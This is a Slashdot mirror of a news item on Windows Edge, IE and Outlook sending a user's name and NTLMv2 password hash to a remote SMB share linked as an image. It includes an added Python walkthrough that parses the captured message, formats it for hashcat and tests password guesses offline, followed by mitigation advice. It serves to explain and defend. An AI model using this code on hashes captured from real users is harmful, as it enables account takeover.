Slashdot Mirror


Microsoft Live Account Credentials Leaking From Windows 8 And Above (hackaday.com)

An anonymous reader writes: Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user's Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account). The bug itself seems to be present in all Windows systems since Windows 95 / NT, although only Windows 8 and above are effectively compromised. To see if your machine is affected, you may want to check the public demonstration of the exploit, set up by the guys from [Perfect Privacy] and based on [VladikSS]'s original work. Basically, the default User Authentication Settings of Edge/Spartan (also Internet Explorer, Outlook) let the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. Doing so, it will silently send the user's Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker's network share.
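What actually arrives at the attacker's share is an NTLM AUTHENTICATE_MESSAGE (Type 3): the user, domain and workstation names in clear UTF-16, plus an NTLMv2 response, which is an HMAC-MD5 proof keyed on the MD4 hash of the password over the server's challenge. The example below is added here and is not code from the article, from Perfect Privacy or from VladikSS. It builds such a message from a constructed user name, machine name, password and pair of challenges (all of them assumptions chosen for illustration), parses it the way a rogue SMB server would, emits the Net-NTLMv2 line that hashcat mode 5600 consumes, and shows why a single captured response is enough to test password guesses offline. The MD4 routine is inlined because OpenSSL 3 often ships with `hashlib.new("md4")` disabled; the message layout follows MS-NLMP with the optional Version and MIC fields omitted.

```python
"""What an NTLM AUTHENTICATE_MESSAGE leaks to a rogue share (added example,
not code from the article, Perfect Privacy or VladikSS). All names, the
password and the challenges below are constructed for illustration."""
import hmac
import hashlib
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Needed for the NT hash: MD4(UTF-16LE(password))."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = [
        (f, 0, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def ntlmv2_response(user, domain, password, server_challenge, client_challenge, target_info, timestamp):
    """NtChallengeResponse = NTProofStr || blob, per MS-NLMP 3.3.2 (client side)."""
    nt_hash = md4(password.encode("utf-16-le"))
    key = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def build_authenticate(user, domain, workstation, nt_response, flags=0x00088205):
    """Minimal Type 3 message: 64-byte header (no Version/MIC) followed by the payload."""
    header = b"NTLMSSP\x00" + struct.pack("<I", 3)
    fields, payload = [], b""
    for item in (b"", nt_response, domain.encode("utf-16-le"), user.encode("utf-16-le"),
                 workstation.encode("utf-16-le"), b""):  # Lm, Nt, Domain, User, Workstation, SessionKey
        fields.append(struct.pack("<HHI", len(item), len(item), 64 + len(payload)))
        payload += item
    return header + b"".join(fields) + struct.pack("<I", flags) + payload


def parse_authenticate(msg: bytes) -> dict:
    """What the rogue server reads out of the message the victim's browser/mail client sent."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")

    def field(i):  # (Len, MaxLen, BufferOffset) descriptors start at byte 12
        ln, _, off = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        return msg[off:off + ln]

    nt = field(1)
    return {"domain": field(2).decode("utf-16-le"), "user": field(3).decode("utf-16-le"),
            "workstation": field(4).decode("utf-16-le"),
            "nt_proof": nt[:16], "blob": nt[16:], "flags": struct.unpack_from("<I", msg, 60)[0]}


def hashcat_line(parsed, server_challenge):
    """Net-NTLMv2 line in the format hashcat -m 5600 / john --format=netntlmv2 accept."""
    return (f"{parsed['user']}::{parsed['domain']}:{server_challenge.hex()}:"
            f"{parsed['nt_proof'].hex()}:{parsed['blob'].hex()}")


def check_password(parsed, server_challenge, candidate):
    """Offline guess: recompute NTProofStr from a candidate password and compare."""
    nt_hash = md4(candidate.encode("utf-16-le"))
    key = hmac.new(nt_hash, (parsed["user"].upper() + parsed["domain"]).encode("utf-16-le"),
                   hashlib.md5).digest()
    proof = hmac.new(key, server_challenge + parsed["blob"], hashlib.md5).digest()
    return hmac.compare_digest(proof, parsed["nt_proof"])


# Constructed sample values (assumptions, not captured data).
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")   # from the rogue server's CHALLENGE_MESSAGE
CLIENT_CHALLENGE = bytes.fromhex("fedcba9876543210")
TARGET_INFO = b"\x02\x00\x0e\x00" + "EXAMPLE".encode("utf-16-le") + b"\x00\x00\x00\x00"  # AvNbDomainName, AvEOL
TIMESTAMP = 132_000_000_000_000_000                     # FILETIME, arbitrary


def demo():
    """Victim 'alice' on machine DESKTOP-EXAMPLE fetches \\\\attacker\\share\\x.png."""
    nt = ntlmv2_response("alice", "DESKTOP-EXAMPLE", "password",
                         SERVER_CHALLENGE, CLIENT_CHALLENGE, TARGET_INFO, TIMESTAMP)
    msg = build_authenticate("alice", "DESKTOP-EXAMPLE", "DESKTOP-EXAMPLE", nt)
    return parse_authenticate(msg), msg


if __name__ == "__main__":
    parsed, _ = demo()
    print(hashcat_line(parsed, SERVER_CHALLENGE))
    print("guess 'password' correct:", check_password(parsed, SERVER_CHALLENGE, "password"))
```

Two practical consequences follow from the layout. The challenge is chosen by the attacker's server, so it can be fixed to a known value and the proof fed straight to a cracker; and because the message also names the workstation and carries the machine's AV pairs in the blob, it identifies the victim host even when the password is never recovered. On the defensive side, the setting a practitioner would check is the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, together with blocking outbound TCP 445/139 at the network edge, since neither the browser nor the mail client gives the user any indication that an SMB connection was made.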

2 of 55 comments

  1. Re:So that's what it does? by Zak3056 · · Score: 4, Insightful

    It was a great workaround back before active directory. If you didn't have access to a share, just figure out the owner's username (pre-populated on their lock screen), and create a new local user on your machine with the same username, connect to the share as that user, done.

    That workaround doesn't work... the password has to match as well.

    --
    What part of "shall not be infringed" is so hard to understand?
  2. Re:That's the problem. It's internet, Windows thin by NotInHere · · Score: 3, Insightful

    I'd prefer if it didn't do much distinction. One compromised device inside a local network shouldn't be enough to escalate it to control every device inside. If you trust devices on a basis "it's in our network", then you are doing something wrong.